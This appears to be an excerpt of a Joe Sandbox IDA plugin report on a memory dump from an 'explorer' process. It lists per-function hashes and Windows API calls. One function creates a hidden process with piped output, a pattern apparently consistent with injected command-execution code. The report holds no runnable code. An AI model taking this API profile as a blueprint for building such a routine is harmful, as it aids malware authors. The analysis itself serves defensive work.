                                                                                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2417226690-0
                                                                                                                                                                                                                        • Opcode ID: 374ddeace7e295bf3a557cb835af92d1f825ba471be8ee6c2f8e1db2d730fabb
                                                                                                                                                                                                                        • Instruction ID: 9d499d91622ec0ecd6f1e4381cf8e5793228230227b59a05099a7928e9140c40
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 374ddeace7e295bf3a557cb835af92d1f825ba471be8ee6c2f8e1db2d730fabb
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 60F05536B0020457DB04AF35DC04B6BBF95EFC27A0B06045CEF0A8B251C6B1A847CB94
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,02F15784,?,20001004,00000000,00000002,?,?,02F14D91), ref: 02F18462
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2299586839-0
                                                                                                                                                                                                                        • Opcode ID: 6fd86540f2f90111ec99e044e918ade5880779324426b0d838dc017c4fcce579
                                                                                                                                                                                                                        • Instruction ID: 18eae0f821074a94debe68865cb7895735d2faecc79bee943418960a61da2622
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6fd86540f2f90111ec99e044e918ade5880779324426b0d838dc017c4fcce579
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30E04F3294021CBBEF122F60DD08AAE7F1BEF447E1F408415FE0566261CF318920AE90
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_0002A304,02F09E18), ref: 02F0A2FD
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                                                                        • Opcode ID: 2b4bb37a74cb5cc9419a92b1adbf46170af8443d518913a302de0fa8d144b4b3
                                                                                                                                                                                                                        • Instruction ID: 6cd2fc3d26d7717e08c8f6690674e12d7889b883a1eafaa05cd9f5a1d0d38b76
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2b4bb37a74cb5cc9419a92b1adbf46170af8443d518913a302de0fa8d144b4b3
                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: HeapProcess
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 54951025-0
                                                                                                                                                                                                                        • Opcode ID: bb22f7e1b7e7f6e7e488f54e1524c924e95b6e81958b64d7c7b1af709e87a820
                                                                                                                                                                                                                        • Instruction ID: 8d34845ab734bd51a282d7b1f02719c2b9a2b753e07e7b16779f87cb5d1a391d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bb22f7e1b7e7f6e7e488f54e1524c924e95b6e81958b64d7c7b1af709e87a820
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9AA01270940104AF43404E30598420976D55500AC0304042E5004C0400DA7040A06701
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetTempPathA.KERNEL32(00000080,?,?,?,?,?,?,?,?,?), ref: 02EE832D
                                                                                                                                                                                                                        • CreatePipe.KERNEL32(00000000,00000000,0000000C,00000000), ref: 02EE8403
                                                                                                                                                                                                                        • SetHandleInformation.KERNEL32(00000000,00000001,00000000), ref: 02EE8415
                                                                                                                                                                                                                        • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 02EE8459
                                                                                                                                                                                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00000044,?), ref: 02EE8481
                                                                                                                                                                                                                        • Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 02EE848F
                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,00000064), ref: 02EE84B8
                                                                                                                                                                                                                        • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 02EE84DA
                                                                                                                                                                                                                        • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 02EE84FE
                                                                                                                                                                                                                        • ReadFile.KERNEL32(00000000,?,0000007F,00000000,00000000), ref: 02EE8525
                                                                                                                                                                                                                        • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 02EE856A
                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 02EE8581
                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 02EE8589
                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02EE8591
                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02EE8599
                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 02EE85A3
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Handle$ClosePipeWow64$NamedPeek$CreateRedirection$DisableErrorFileInformationLastObjectPathProcessReadRevertSingleTempWait
                                                                                                                                                                                                                        • String ID: D
                                                                                                                                                                                                                        • API String ID: 3215130363-2746444292
                                                                                                                                                                                                                        • Opcode ID: 12e301734eedc5c211aa77d9ac2d13cb26e47b45c3be58b612d88e870ea1eccf
                                                                                                                                                                                                                        • Instruction ID: 768ad40716d2d7384cf58e04ab41d22cc5c025d05e39bd93aa94e2c70b4b6247
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 12e301734eedc5c211aa77d9ac2d13cb26e47b45c3be58b612d88e870ea1eccf
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0BA17F71D8022CABEF25DB60CD45FDDB7BAAF04744F1041DAEA09A61D0DB75AA84CF90
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _free$___from_strstr_to_strchr
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3409252457-0
                                                                                                                                                                                                                        • Opcode ID: c5088ad3a90324c926df14df09cf070f3b5e97844f3776dba7ace64975d54fe4
                                                                                                                                                                                                                        • Instruction ID: fc92ff98f78aad549d0a2e86af6818dc4a501da6878517572e9d4fa1499b19c9
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c5088ad3a90324c926df14df09cf070f3b5e97844f3776dba7ace64975d54fe4
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B5D106B6E00305AFDB25AFB48C40A6EB7E5AF053D4F94476DEB05A7680EB719500CF91
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _free$Info
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2509303402-0
                                                                                                                                                                                                                        • Opcode ID: 795702d2abae2d32b0a47ae9a89ab84add25527c8c9ca0390c31f533955d4396
                                                                                                                                                                                                                        • Instruction ID: 02d972a54cd15c88e6b97ef70bd41721a96390e1b294e11495a91adfbad6d21f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 795702d2abae2d32b0a47ae9a89ab84add25527c8c9ca0390c31f533955d4396
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 20D19E71D002159FDB21DFA8C880BEEBBF5BF08390F544169EA99E7281DB75A845CB60
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(02F47FA8,00000FA0,?,?,02F096C8), ref: 02F096F6
                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,02F096C8), ref: 02F09701
                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,02F096C8), ref: 02F09712
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 02F09724
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 02F09732
                                                                                                                                                                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,02F096C8), ref: 02F09755
                                                                                                                                                                                                                        • DeleteCriticalSection.KERNEL32(02F47FA8,00000007,?,?,02F096C8), ref: 02F09771
                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,02F096C8), ref: 02F09781
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        • WakeAllConditionVariable, xrefs: 02F0972A
                                                                                                                                                                                                                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 02F096FC
                                                                                                                                                                                                                        • kernel32.dll, xrefs: 02F0970D
                                                                                                                                                                                                                        • SleepConditionVariableCS, xrefs: 02F0971E
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                                                                                                                                                        • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                        • API String ID: 2565136772-3242537097
                                                                                                                                                                                                                        • Opcode ID: f18a15d6eb3b09ddc14cae1e83a7dd4dfc8909cba4d16917bcf8e18402a2dead
                                                                                                                                                                                                                        • Instruction ID: 15f5a750a9d228328cec886a63c159cd404e175a1eaa66f9ef55b5a51310ea14
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f18a15d6eb3b09ddc14cae1e83a7dd4dfc8909cba4d16917bcf8e18402a2dead
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4201B575EC13095BF7212F74AD48A26FB99BF40FE1B040D55FA05D2581EFF0C81086A0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • ___free_lconv_mon.LIBCMT ref: 02F211F3
                                                                                                                                                                                                                          • Part of subcall function 02F204A9: _free.LIBCMT ref: 02F204C6
                                                                                                                                                                                                                          • Part of subcall function 02F204A9: _free.LIBCMT ref: 02F204D8
                                                                                                                                                                                                                          • Part of subcall function 02F204A9: _free.LIBCMT ref: 02F204EA
                                                                                                                                                                                                                          • Part of subcall function 02F204A9: _free.LIBCMT ref: 02F204FC
                                                                                                                                                                                                                          • Part of subcall function 02F204A9: _free.LIBCMT ref: 02F2050E
                                                                                                                                                                                                                          • Part of subcall function 02F204A9: _free.LIBCMT ref: 02F20520
                                                                                                                                                                                                                          • Part of subcall function 02F204A9: _free.LIBCMT ref: 02F20532
                                                                                                                                                                                                                          • Part of subcall function 02F204A9: _free.LIBCMT ref: 02F20544
                                                                                                                                                                                                                          • Part of subcall function 02F204A9: _free.LIBCMT ref: 02F20556
                                                                                                                                                                                                                          • Part of subcall function 02F204A9: _free.LIBCMT ref: 02F20568
                                                                                                                                                                                                                          • Part of subcall function 02F204A9: _free.LIBCMT ref: 02F2057A
                                                                                                                                                                                                                          • Part of subcall function 02F204A9: _free.LIBCMT ref: 02F2058C
                                                                                                                                                                                                                          • Part of subcall function 02F204A9: _free.LIBCMT ref: 02F2059E
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F211E8
                                                                                                                                                                                                                          • Part of subcall function 02F17C06: HeapFree.KERNEL32(00000000,00000000,?,02F20BFE,?,00000000,?,8B18EC83,?,02F20EA1,?,00000007,?,?,02F21346,?), ref: 02F17C1C
                                                                                                                                                                                                                          • Part of subcall function 02F17C06: GetLastError.KERNEL32(?,?,02F20BFE,?,00000000,?,8B18EC83,?,02F20EA1,?,00000007,?,?,02F21346,?,?), ref: 02F17C2E
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F2120A
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F2121F
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F2122A
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F2124C
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F2125F
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F2126D
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F21278
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F212B0
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F212B7
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F212D4
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F212EC
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 161543041-0
                                                                                                                                                                                                                        • Opcode ID: 23abe24928e9fc63c49866b33075412a0c5a93cca5284a06fde856bf9b646986
                                                                                                                                                                                                                        • Instruction ID: 46cc169b5541785466ac69f28c6ee139d9048c15e88b9c563f56ccde13ad0e7d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 23abe24928e9fc63c49866b33075412a0c5a93cca5284a06fde856bf9b646986
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 39317A71A002149FEB31AE78DD04F5BB7EAAF023D0F604419E64DE6191DF35A888CF64
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _free
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                                                                                                        • Opcode ID: 2cbe3638b79cbf06ba32fd1449d1f3a26055f51cb8773e94ee907f766dd683cd
                                                                                                                                                                                                                        • Instruction ID: 7d4162e706a78865c1801fc4b20784c8b31ec0801875d3f429de2a77e1149ce7
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2cbe3638b79cbf06ba32fd1449d1f3a26055f51cb8773e94ee907f766dd683cd
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3DC175B6E40214AFEB20DB98CC41FDEB7F9AB09744F544065FB05FB281DB719A458B90
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 0-3907804496
                                                                                                                                                                                                                        • Opcode ID: dc502dc0d32683308ae2aa99816b958ece68b0504a9844690a512416798518b6
                                                                                                                                                                                                                        • Instruction ID: 567b13039781a8970d3da61e94e29045f4a1ec1e4ca08d63de4961676e08ad9e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dc502dc0d32683308ae2aa99816b958ece68b0504a9844690a512416798518b6
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0EC10375E04249DFDF1ADFA8C880BADBBB1BF49388F844159EA04AB391C7709945CF60
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 02F231FA: CreateFileW.KERNEL32(00000000,00000000,?,02F235EA,?,?,00000000,?,02F235EA,00000000,0000000C), ref: 02F23217
                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 02F23655
                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 02F2365C
                                                                                                                                                                                                                        • GetFileType.KERNEL32(00000000), ref: 02F23668
                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 02F23672
                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 02F2367B
                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02F2369B
                                                                                                                                                                                                                        • CloseHandle.KERNEL32(02F16E41), ref: 02F237E8
                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 02F2381A
                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 02F23821
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                        • String ID: H
                                                                                                                                                                                                                        • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                        • Opcode ID: a65aad0f2c7c366165b4d5438ecaf14359360e18ad9f5985c642e69717c928c5
                                                                                                                                                                                                                        • Instruction ID: 0373c9eeb67aa099d3fae36634738d345323af31db20caad08a11d228f353260
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a65aad0f2c7c366165b4d5438ecaf14359360e18ad9f5985c642e69717c928c5
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 24A13872E041689FCF199F68DC51BAD7BA2AB073A4F14018DE905AF391CB38895ACF51
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • IsInExceptionSpec.LIBVCRUNTIME ref: 02F0CB0F
                                                                                                                                                                                                                        • type_info::operator==.LIBVCRUNTIME ref: 02F0CB31
                                                                                                                                                                                                                        • ___TypeMatch.LIBVCRUNTIME ref: 02F0CC40
                                                                                                                                                                                                                        • IsInExceptionSpec.LIBVCRUNTIME ref: 02F0CD12
                                                                                                                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 02F0CD96
                                                                                                                                                                                                                        • CallUnexpected.LIBVCRUNTIME ref: 02F0CDB1
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                        • String ID: csm$csm$csm
                                                                                                                                                                                                                        • API String ID: 2123188842-393685449
